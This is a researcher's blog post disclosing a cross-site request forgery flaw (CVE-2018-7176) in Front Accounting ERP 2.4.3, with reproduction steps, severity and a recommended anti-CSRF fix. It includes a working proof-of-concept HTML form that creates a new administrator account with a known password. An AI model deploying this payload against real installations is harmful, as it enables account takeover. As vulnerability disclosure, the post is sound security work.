Cross Site Request Forgery- Front Accounting ERP 2.4.3 - CVE-2018-7176

Cross Site Request Forgery- Front Accounting ERP 2.4.3


By- Samrat Das

Hi Readers,

Recently while performing some open source security assessment, I came across an ERP Application- Front Accounting . Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’. 

Title of the Vulnerability:  Cross Site Request Forgery.
Vulnerability Class: Remote Code Execution/ Account takeover
Technical Details & Description: The application source code is coded in a way which allows malicious crafted HTML page to be executed directly without any anti csrf countermeasures.
CVE ID allocated:  CVE-2018-7176
Product & Service Introduction: Front Accounting 2.4.3
Steps to Re-Produce –
1.       Visit the application
2.       Visit the User Permissions Page.
3.        Goto add user, and create a csrf crafted exploit for the same , upon hosting it on a server and sending the link to click by victim, it gets exploited.
Exploitation Technique: A attacker can perform application modification to complete account takeover.
Severity Level: Critical
Security Risk:
The presence of such a risk can lead to user data compromise as well as account takeover

Exploit code:
<html>
 <body>
    <form action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml" method="POST" enctype="text/plain">
      <input type="hidden" name="show&#95;inactive" value="&amp;user&#95;id&#61;Newadmin&amp;password&#61;Newadmin&amp;real&#95;name&#61;New&#37;20Admin&amp;phone&#61;&amp;email&#61;&amp;role&#95;id&#61;8&amp;language&#61;C&amp;pos&#61;1&amp;print&#95;profile&#61;&amp;rep&#95;popup&#61;1&amp;ADD&#95;ITEM&#61;Add&#37;20new&amp;&#95;focus&#61;user&#95;id&amp;&#95;modified&#61;0&amp;&#95;confirmed&#61;&amp;&#95;token&#61;Ta6aiT2xqlL2vg8u9aAvagxx&amp;&#95;random&#61;757897&#46;6552143205" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affected Product Version: 2.4.3

Solution - Fix & Patch: The application code should be configured with an anti csrf token to mitigate the issue of Cross Site request forgery.





Comments

Popular posts from this blog

Arbitrary file upload and RCE in Wonder CMS - CVE-2017-14521

Cross Site Request Forgery- Intex Router N-150 | CVE-2018-12529

Stored XSS in Wonder CMS- CVE-2017-14522